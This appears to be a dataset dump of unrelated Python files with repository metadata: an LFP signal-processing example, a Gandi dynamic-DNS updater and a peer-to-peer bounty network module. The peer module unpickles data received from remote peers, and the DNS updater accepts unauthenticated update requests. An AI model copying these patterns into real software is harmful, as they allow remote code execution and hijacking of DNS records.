_get_viewport(viz.viewport, viewport) viz.camera = _get_camera(viz.viewport) for layer in viz.layers: layer.map_index = map_index layer.reset_ui(viz) layout.append(viz.get_content()) return layout def _get_viewport(map_settings_viewport, layout_viewport): if map_settings_viewport is not None: return map_settings_viewport return layout_viewport def _get_camera(viewport): camera = None if viewport is not None: camera = { 'center': get_center(viewport), 'zoom': viewport.get('zoom'), 'bearing': viewport.get('bearing'), 'pitch': viewport.get('pitch') } return camera def _get_is_static(map_settings_is_static, layout_is_static): if map_settings_is_static is not None: return map_settings_is_static return layout_is_static def _get_publisher(credentials): return KuvizPublisher(credentials)
bsd-3-clause
7,968,791,184,678,179,000
36.090909
117
0.586104
false
alphacsc/alphacsc
examples/csc/plot_lfp_data.py
1
3791
""" ============================== CSC to learn LFP spiking atoms ============================== Here, we show how CSC can be used to learn spiking atoms from Local Field Potential (LFP) data [1]. [1] Hitziger, Sebastian, et al. Adaptive Waveform Learning: A Framework for Modeling Variability in Neurophysiological Signals. IEEE Transactions on Signal Processing (2017). """ ############################################################################### # First, let us fetch the data (~14 MB) import os from mne.utils import _fetch_file url = ('https://github.com/hitziger/AWL/raw/master/Experiments/data/' 'LFP_data_contiguous_1250_Hz.mat') fname = './LFP_data_contiguous_1250_Hz.mat' if not os.path.exists(fname): _fetch_file(url, fname) ############################################################################### # It is a mat file, so we use scipy to load it from scipy import io data = io.loadmat(fname) X, sfreq = data['X'].T, float(data['sfreq']) ############################################################################### # And now let us look at the data import numpy as np import matplotlib.pyplot as plt start, stop = 11000, 15000 times = np.arange(start, stop) / sfreq plt.plot(times, X[0, start:stop], color='b') plt.xlabel('Time (s)') plt.ylabel(r'$\mu$ V') plt.xlim([9., 12.]) ############################################################################### # and filter it using a convenient function from MNE. This will remove low # frequency drifts, but we keep the high frequencies from mne.filter import filter_data X = filter_data( X.astype(np.float64), sfreq, l_freq=1, h_freq=None, fir_design='firwin') ############################################################################### # Now, we define the parameters of our model. reg = 6.0 n_times = 2500 n_times_atom = 350 n_trials = 100 n_atoms = 3 n_iter = 60 ############################################################################### # Let's stick to one random state for now, but if you want to learn how to # select the random state, consult :ref:`this example # <sphx_glr_auto_examples_plot_simulate_randomstate.py>`. random_state = 10 ############################################################################### # Now, we epoch the trials overlap = 0 starts = np.arange(0, X.shape[1] - n_times, n_times - overlap) stops = np.arange(n_times, X.shape[1], n_times - overlap) X_new = [] for idx, (start, stop) in enumerate(zip(starts, stops)): if idx >= n_trials: break X_new.append(X[0, start:stop]) X_new = np.vstack(X_new) del X ############################################################################### # We remove the mean and scale to unit variance. X_new -= np.mean(X_new) X_new /= np.std(X_new) ############################################################################### # The convolutions can result in edge artifacts at the edges of the trials. # Therefore, we discount the contributions from the edges by windowing the # trials. from numpy import hamming X_new *= hamming(n_times)[None, :] ############################################################################### # Of course, in a data-limited setting we want to use as much of the data as # possible. If this is the case, you can set `overlap` to non-zero (for example # half the epoch length). # # Now, we run regular CSC since the trials are not too noisy from alphacsc import learn_d_z pobj, times, d_hat, z_hat, reg = learn_d_z(X_new, n_atoms, n_times_atom, reg=reg, n_iter=n_iter, random_state=random_state, n_jobs=1) ############################################################################### # Let's look at the atoms now. plt.figure() plt.plot(d_hat.T) plt.show()
bsd-3-clause
-4,877,237,652,640,226,000
34.101852
79
0.512002
false
AlessioCasco/gandi-dyndns
gandi-dyndns.py
1
9763
#!/usr/bin/env python # -*- coding: utf-8 -*- """ gandi-dyndns @author: AlessioCasco """ from bottle import route, run, request, response from optparse import OptionParser import logging as log import xmlrpclib import json import sys import re gandi_fqdn_ip = {} @route('/ping', method=['GET', 'POST']) def ping(): '''Function for monitoring/ping''' response.headers['Server'] = 'gandi-dyndns' response.status = 200 return('I\'am alive!\n') @route('/nic_update', method=['GET', 'POST']) def gandi_dyndns(): '''Main function''' response.headers['Server'] = 'gandi-dyndns' # dictionary gandi_fqdn_ip, has fqdn:ip key:value from all the legit requests global gandi_fqdn_ip # dictionar ynew_fqdn_ip, has fqdn:ip key:value from the current request new_fqdn_ip = {} # define the action to perform into the gandi_api function action = '' try: fqdn, new_ip, fqdn_match = fetch_parameters() except TypeError: response.status = 400 return # create new dictionary with the info we got from the webserver new_fqdn_ip[fqdn] = new_ip # check if we need to fetch the ip from gandi try: if new_fqdn_ip[fqdn] != gandi_fqdn_ip[fqdn]: log.debug('Received IP differs from the one saved on Gandi, will update it') action = 'update' gandi_fqdn_ip = gandi_api(new_fqdn_ip, gandi_fqdn_ip, fqdn, fqdn_match, action) return except KeyError: log.debug('Do not know the current Gandi IP for fqdn %s, will fetch it' % fqdn) try: action = 'fetch' gandi_fqdn_ip = gandi_api(new_fqdn_ip, gandi_fqdn_ip, fqdn, fqdn_match, action) if new_fqdn_ip[fqdn] != gandi_fqdn_ip[fqdn]: action = 'update' gandi_fqdn_ip = gandi_api(new_fqdn_ip, gandi_fqdn_ip, fqdn, fqdn_match, action) return except ValueError: response.status = 404 return log.debug('Nothing to do, received IP is same as the one configured on gandi for %s' % fqdn) return def fetch_parameters(): '''Fetch parameters from the GET request''' new_ip = '' method = request.environ.get('REQUEST_METHOD') # check for missing parameters if not request.params.ip and not request.params.fqdn: log.error('Received malformed request, both parameters (fqdn & ip) are missing. Got: \"%s\"' % request.url) return elif not request.params.ip: new_ip = request.environ.get('REMOTE_ADDR') log.debug('IP parameter is missing, will use client source one: %s' % new_ip) elif not request.params.fqdn: log.error('Received malformed request, fqdn parameter is missing. Got: \"%s\"' % request.url) return if not new_ip: new_ip = request.params.ip fqdn = request.params.fqdn # check if parameters have correct informations fqdn_match = re.match(r'^([a-zA-Z0-9][a-zA-Z0-9-]{1,61})\.([a-zA-Z0-9][a-zA-Z0-9-]{1,61}\.[a-zA-Z]{2,}$)', fqdn) ip_match = re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', new_ip) priv_ip_match = re.match(r'^(?:10|127|172\.(?:1[6-9]|2[0-9]|3[01])|192\.168)\..*', new_ip) if not fqdn_match and not ip_match: log.error('Received invalid values on both parameters. Got fqdn:\"%s\" & IP: %s' % (fqdn, new_ip)) return elif not ip_match: log.error('Received invalid ip value. Got %s' % new_ip) return elif priv_ip_match: log.error('Received IP is not a public one. Got %s' % new_ip) return elif not fqdn_match: log.error('Received invalid fqdn value. Got \"%s\"' % fqdn) return log.debug('Received %s request: fqdn:\"%s\" & IP: %s' % (method, fqdn, new_ip)) return fqdn, new_ip, fqdn_match def gandi_api(new_fqdn_ip, gandi_fqdn_ip, fqdn, fqdn_match, action): '''Funcion for managing the Gandi API''' # define some variables about gandi api = xmlrpclib.ServerProxy('https://rpc.gandi.net/xmlrpc/') apikey = config['apikey'] hostname = (fqdn_match.group(1)) domain = (fqdn_match.group(2)) # check if the domain is managed by the apikey provided if not (api.domain.list(apikey, {'~fqdn': domain})): log.error('Apikey provided does not manage %s domain' % domain) raise ValueError('Apikey provided does not manage %s domain' % domain) # check available zones zones = api.domain.zone.list(apikey) for zone in zones: if (zone['name']) == domain: zone_id = zone['id'] log.debug('Zone id %s found, for domain %s' % (zone_id, domain)) break else: log.error('Could not find zone file called %s, you must have a zone having same name as the domain you want to manage' % domain) raise ValueError('Could not find zone file called %s, you must have a zone having same name as the domain you want to manage' % domain) # check if we have to fetch the gandi api if action == 'fetch': # check & retrieve informations from recods in zone records = api.domain.zone.record.list(apikey, zone_id, 0) for record in records: if (record['name'] == hostname and record['type'].lower() == 'a'): # add fqdn/ip to the gandi_fqdn_ip dictionary gandi_fqdn_ip[fqdn] = record['value'] log.debug('DNS \'A\' record found for subdomain \'%s\' having value %s' % (hostname, gandi_fqdn_ip[fqdn])) break else: log.error('Unable to find a DNS \'A\' record for subdomain \'%s\'' % hostname) raise ValueError('Unable to find a DNS \'A\' record for subdomain \'%s\'' % hostname) return gandi_fqdn_ip # check if we have to update the the ip elif action == 'update': # create a new zone from the existing one zone_version = api.domain.zone.version.new(apikey, zone_id) log.debug('New zone created, new version: %s' % zone_version) # delete the A record from the new version api.domain.zone.record.delete(apikey, zone_id, zone_version, {"type": ["A"], "name": [hostname]}) log.debug('Deleted \'A\' record from new zone version %s' % zone_version) # add the A record we want new_record = api.domain.zone.record.add(apikey, zone_id, zone_version, {"type": "A", "name": hostname, "value": new_fqdn_ip[fqdn], "ttl": 300}) log.debug('New \'A\' record added as follow: %s' % new_record) # active the new zone version if api.domain.zone.version.set(apikey, zone_id, zone_version): log.info('New IP %s for fqdn %s updated succesfully.' % (new_fqdn_ip[fqdn], fqdn)) else: log.error('Unable to update IP %s for fqdn %s' % (new_fqdn_ip[fqdn], fqdn)) return # update gandi_fqdn_ip with the value just saved in the new zone version gandi_fqdn_ip[fqdn] = new_fqdn_ip[fqdn] return gandi_fqdn_ip def init_application(): def get_options(): '''Load options from the command line''' default_config = "config.json" parser = OptionParser(usage="usage: %prog [options]") parser.add_option( "-c", "--config", dest="configfile", default=default_config, help='Config file relative or absolute path. Default is %s' % default_config) (options, args) = parser.parse_args() if options.configfile is not None: options.configfile = options.configfile.strip(' ') return options def read_config_file(configfile): '''Loads the config file from disk''' try: with open(configfile) as f: config = validate_config(json.load(f)) return config # catch if file doesn't exist except IOError: print('Config file %s not found' % configfile) sys.exit(1) # catch if json file is not formatted corectly except ValueError: print('Json file is not formatted properly') sys.exit(1) def validate_config(raw_config): '''Checks the config file.''' # check if required patameters are present inside the config if 'port' not in raw_config or 'bind' not in raw_config or 'apikey' not in raw_config or 'logging' not in raw_config: print('Config file has missing parameters') sys.exit(1) else: return raw_config def configure_logging(config): '''Configure logging''' if config['logging']['log_enable'] == "false": log.disable('CRITICAL') return elif config['logging']['log_enable'] == "true": try: log.basicConfig( format='%(asctime)-15s [%(levelname)s] %(message)s', filename=config['logging']['log_file'], level=config['logging']['log_level']) except ValueError: print('Log level is not set with a correct value, check the README.md for the full list') sys.exit(1) except IOError: print('Unable to create the log file, check if gandi-dyndns has write permissions') sys.exit(1) return else: print('Bad congig file, log_enable is not set with a correct value, (true|false) are the two only options') sys.exit(1) options = get_options() config = read_config_file(options.configfile) configure_logging(config) return config if __name__ == "__main__": config = init_application() # init webserver run(host=config["bind"], port=config["port"], quiet=True)
mit
-3,330,188,730,535,708,700
40.021008
151
0.597767
false
gappleto97/Senior-Project
common/peers.py
1
16088
from multiprocessing import Queue import multiprocessing, os, pickle, select, socket, sys, time, rsa, traceback from common.safeprint import safeprint from common.bounty import * global ext_port global ext_ip global port global myPriv global myPub global propQueue ext_port = -1 ext_ip = "" port = 44565 myPub, myPriv = rsa.newkeys(1024) propQueue = multiprocessing.Queue() seedlist = [("127.0.0.1", 44565), ("localhost", 44565), ("10.132.80.128", 44565)] peerlist = [("24.10.111.111", 44565)] remove = [] bounties = [] # constants peers_file = "data" + os.sep + "peerlist.pickle" key_request = "Key Request".encode('utf-8') close_signal = "Close Signal".encode("utf-8") peer_request = "Requesting Peers".encode("utf-8") bounty_request = "Requesting Bounties".encode("utf-8") incoming_bounties = "Incoming Bounties".encode("utf-8") incoming_bounty = "Incoming Bounty".encode("utf-8") valid_signal = "Bounty was valid".encode("utf-8") invalid_signal = "Bounty was invalid".encode("utf-8") end_of_message = "End of message".encode("utf-8") sig_length = len(max( close_signal, peer_request, bounty_request, incoming_bounties, incoming_bounty, valid_signal, invalid_signal, key=len)) def pad(string): return string + " ".encode('utf-8') * (sig_length - (((len(string) - 1) % sig_length) + 1)) close_signal = pad(close_signal) peer_request = pad(peer_request) bounty_request = pad(bounty_request) incoming_bounties = pad(incoming_bounties) incoming_bounty = pad(incoming_bounty) valid_signal = pad(valid_signal) invalid_signal = pad(invalid_signal) end_of_message = pad(end_of_message) signals = [close_signal, peer_request, bounty_request, incoming_bounty, valid_signal, invalid_signal] def send(msg, conn, key): while key is None: safeprint("Key not found. Requesting key") conn.send(key_request) try: key = pickle.loads(conn.recv(1024)) key = rsa.PublicKey(key[0], key[1]) safeprint("Key received") except EOFError: continue if not isinstance(msg, type("a".encode('utf-8'))): msg = msg.encode('utf-8') x = 0 while x < len(msg) - 117: conn.sendall(rsa.encrypt(msg[x:x+117], key)) x += 117 conn.sendall(rsa.encrypt(msg[x:], key)) conn.sendall(rsa.encrypt(end_of_message, key)) return key def recv(conn): received = "".encode('utf-8') a = "" try: while True: a = conn.recv(128) if a == key_request: safeprint("Key requested. Sending key") conn.sendall(pickle.dumps((myPriv.n, myPriv.e), 0)) continue a = rsa.decrypt(a, myPriv) safeprint("Packet = " + str(a), verbosity=3) if a == end_of_message: return received received += a except rsa.pkcs1.DecryptionError as error: safeprint("Decryption error---Content: " + str(a)) return "".encode('utf-8') def get_lan_ip(): """Retrieves the LAN ip. Expanded from http://stackoverflow.com/a/28950776""" import socket s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: # doesn't even have to be reachable s.connect(('8.8.8.8', 23)) IP = s.getsockname()[0] except: IP = '127.0.0.1' finally: s.close() return IP def getFromFile(): """Load peerlist from a file""" if os.path.exists(peers_file): try: peerlist.extend(pickle.load(open(peers_file, "rb"))) trimPeers() except: safeprint("Could not load peerlist from file") def saveToFile(): """Save peerlist to a file""" if not os.path.exists(peers_file.split(os.sep)[0]): os.mkdir(peers_file.split(os.sep)[0]) pickle.dump(peerlist[:], open(peers_file, "wb"), 0) def getFromSeeds(): """Make peer requests to each address on the seedlist""" for seed in seedlist: safeprint(seed, verbosity=1) peerlist.extend(requestPeerlist(seed)) time.sleep(1) def requestPeerlist(address): """Request the peerlist of another node. Currently has additional test commands""" conn = socket.socket() conn.settimeout(5) safeprint(address, verbosity=1) try: conn.connect(address) key = send(peer_request, conn, None) received = recv(conn) safeprint(pickle.loads(received), verbosity=2) if recv(conn) == peer_request: handlePeerRequest(conn, False, key=key, received=pickle.loads(received)) recv(conn) conn.close() return pickle.loads(received) except Exception as error: safeprint("Failed:" + str(type(error))) safeprint(error) remove.extend([address]) return [] def requestBounties(address): """Request the bountylist of another node""" conn = socket.socket() conn.settimeout(5) safeprint(address, verbosity=1) try: conn.connect(address) key = send(bounty_request, conn, None) received = recv(conn) if recv(conn) == bounty_request: handleBountyRequest(conn, False, key=key, received=pickle.loads(received)) safeprint(recv(conn)) conn.close() addBounties(pickle.loads(received)) except Exception as error: safeprint("Failed:" + str(type(error))) safeprint(error) remove.extend([address]) def initializePeerConnections(newPort, newip, newport): """Populate the peer list from a previous session, seeds, and from the peer list if its size is less than 12. Then save this new list to a file""" port = newPort # Does this affect the global variable? ext_ip = newip # Does this affect the global variable? ext_port = newport # Does this affect the global variable? safeprint([ext_ip, ext_port]) getFromFile() safeprint("peers fetched from file", verbosity=1) getFromSeeds() safeprint("peers fetched from seedlist", verbosity=1) trimPeers() if len(peerlist) < 12: safeprint(len(peerlist)) newlist = [] for peer in peerlist: newlist.extend(requestPeerlist(peer)) peerlist.extend(newlist) trimPeers() safeprint("getting bounties from peers and seeds", verbosity=1) for peer in peerlist[:] + seedlist[:]: requestBounties(peer) safeprint("peer network extended", verbosity=1) saveToFile() safeprint("peer network saved to file", verbosity=1) safeprint(peerlist) safeprint([ext_ip, ext_port]) def trimPeers(): """Trim the peerlist to a single set, and remove any that were marked as erroneous before""" temp = list(set(peerlist[:])) for peer in remove: try: del temp[temp.index(peer)] except: continue del remove[:] del peerlist[:] peerlist.extend(temp) def listen(port, outbound, q, v, serv): """BLOCKING function which should only be run in a daemon thread. Listens and responds to other nodes""" if serv: from server.bounty import verify, addBounty server = socket.socket() server.bind(("0.0.0.0", port)) server.listen(10) server.settimeout(5) if sys.version_info[0] < 3 and sys.platform == "win32": server.setblocking(True) global ext_ip, ext_port if outbound is True: safeprint("UPnP mode is disabled") else: safeprint("UPnP mode is enabled") if not portForward(port): outbound = True safeprint([outbound, ext_ip, ext_port]) q.put([outbound, ext_ip, ext_port]) while v.value: # is True is implicit safeprint("listening on " + str(get_lan_ip()) + ":" + str(port), verbosity=3) if not outbound: safeprint("forwarded from " + ext_ip + ":" + str(ext_port), verbosity=3) try: conn, addr = server.accept() server.setblocking(True) conn.setblocking(True) safeprint("connection accepted") packet = recv(conn) safeprint("Received: " + packet.decode(), verbosity=3) key = None if packet == peer_request: key = handlePeerRequest(conn, True, key=key) elif packet == bounty_request: key = handleBountyRequest(conn, True, key=key) elif packet == incoming_bounty: key = handleIncomingBounty(conn, key=key) send(close_signal, conn, key) conn.close() server.settimeout(5) safeprint("connection closed") except Exception as error: safeprint("Failed: " + str(type(error))) safeprint(error) traceback.print_exc() def handlePeerRequest(conn, exchange, key=None, received=[]): """Given a socket, send the proper messages to complete a peer request""" if ext_port != -1: unfiltered = peerlist[:] + [((ext_ip, ext_port), myPub.n, myPub.e)] unfiltered = peerlist[:] filtered = list(set(unfiltered) - set(received)) safeprint("Unfiltered: " + str(unfiltered), verbosity=3) safeprint("Filtered: " + str(filtered), verbosity=3) toSend = pickle.dumps(filtered, 0) safeprint("Sending") key = send(toSend, conn, key) if exchange: send(peer_request, conn, key) received = recv(conn) safeprint("Received exchange", verbosity=1) safeprint(pickle.loads(received), verbosity=3) peerlist.extend(pickle.loads(received)) trimPeers() return key def handleBountyRequest(conn, exchange, key=None, received=[]): """Given a socket, send the proper messages to complete a bounty request""" unfiltered = getBountyList() filtered = list(set(unfiltered) - set(received)) toSend = pickle.dumps(filtered, 0) safeprint("Sending") key = send(toSend, conn, key) if exchange: send(bounty_request, conn, key) received = recv(conn) safeprint("Received exchange") try: safeprint(pickle.loads(received), verbosity=2) bounties = pickle.loads(received) valids = addBounties(bounties) toSend = [] for i in range(len(bounties)): if valids[i] >= 0: # If the bounty is valid and not a duplicate, add it to propagation list toSend.append(bounties[i]) propQueue.put((incoming_bounties, toSend)) except Exception as error: safeprint("Could not add bounties") safeprint(type(error)) traceback.print_exc() # later add function to request without charity bounties return key def handleIncomingBounty(conn, key=None): """Given a socket, store an incoming bounty & report it valid or invalid""" received = recv(conn) safeprint("Adding bounty: " + received.decode()) try: valid = addBounty(received) if valid >= -1: # If valid, even if a duplicate, send valid signal safeprint("Sending valid signal") send(valid_signal, conn, key) if valid >= 0: # If valid and not already received, propagate propQueue.put((incoming_bounty, received)) else: send(invalid_signal, conn, key) except Exception as error: send(invalid_signal, conn, key) safeprint("Incoming failed: " + str(type(error))) safeprint(error) traceback.print_exc() return key def propagate(tup): try: conn = socket.socket() address = tup[1] conn.connect(address) key = send(incoming_bounty, conn, None) send(pickle.dumps(tup[0], 0), conn, key) recv(conn) conn.close() except socket.error as Error: safeprint("Connection to " + str(address) + " failed; cannot propagate") def portForward(port): """Attempt to forward a port on your router to the specified local port. Prints lots of debug info.""" try: import miniupnpc u = miniupnpc.UPnP(None, None, 200, port) # Begin Debug info safeprint('inital(default) values :') safeprint(' discoverdelay' + str(u.discoverdelay)) safeprint(' lanaddr' + str(u.lanaddr)) safeprint(' multicastif' + str(u.multicastif)) safeprint(' minissdpdsocket' + str(u.minissdpdsocket)) safeprint('Discovering... delay=%ums' % u.discoverdelay) safeprint(str(u.discover()) + 'device(s) detected') # End Debug info u.selectigd() global ext_ip ext_ip = u.externalipaddress() safeprint("external ip is: " + str(ext_ip)) for i in range(0, 20): try: safeprint("Port forward try: " + str(i), verbosity=1) if u.addportmapping(port+i, 'TCP', get_lan_ip(), port, 'Bounty Net', ''): global ext_port ext_port = port + i safeprint("External port is " + str(ext_port)) return True except Exception as error: safeprint("Failed: " + str(type(error))) safeprint(error) except Exception as error: safeprint("Failed: " + str(type(error))) safeprint(error) return False def listenp(port, v): """BLOCKING function which should only be run in a daemon thread. Listens and responds to other nodes""" import time while v.value: # is True is implicit safeprint("listenp-ing", verbosity=3) try: while propQueue.empty() and v.value: time.sleep(0.01) packet = propQueue.get() safeprint("Received: " + str(packet), verbosity=3) if packet[0] == incoming_bounty: bounty = pickle.loads(packet[1]) if bounty.isValid(): from multiprocessing.pool import ThreadPool ThreadPool().map(propagate, [(bounty, x) for x in peerlist[:]]) elif packet[0] == incoming_bounties: for bounty in packet[1]: if bounty.isValid(): from multiprocessing.pool import ThreadPool ThreadPool().map(propagate, [(bounty, x) for x in peerlist[:]]) safeprint("Packet processed") except Exception as error: safeprint("Failed: " + str(type(error))) safeprint(error) def sync(items): if items.get('config'): from common import settings settings.config = items.get('config') if items.get('peerList'): global peerlist peerList = items.get('peerList') if items.get('bountyList'): from common import bounty bounty.bountyList = items.get('bountyList') if items.get('bountyLock'): from common import bounty bounty.bountyLock = items.get('bountyLock') if items.get('propQueue'): global propQueue propQueue = items.get('propQueue') class listener(multiprocessing.Process): # pragma: no cover """A class to deal with the listener method""" def __init__(self, port, outbound, q, v, serv): multiprocessing.Process.__init__(self) self.outbound = outbound self.port = port self.q = q self.v = v self.serv = serv def run(self): safeprint("listener started") sync(self.items) listen(self.port, self.outbound, self.q, self.v, self.serv) safeprint("listener stopped") class propagator(multiprocessing.Process): # pragma: no cover """A class to deal with the listener method""" def __init__(self, port, v): multiprocessing.Process.__init__(self) self.port = port self.v = v def run(self): safeprint("propagator started") sync(self.items) listenp(self.port, self.v) safeprint("propagator stopped")
mit
-2,676,792,061,939,969,500
34.203501
150
0.599018
false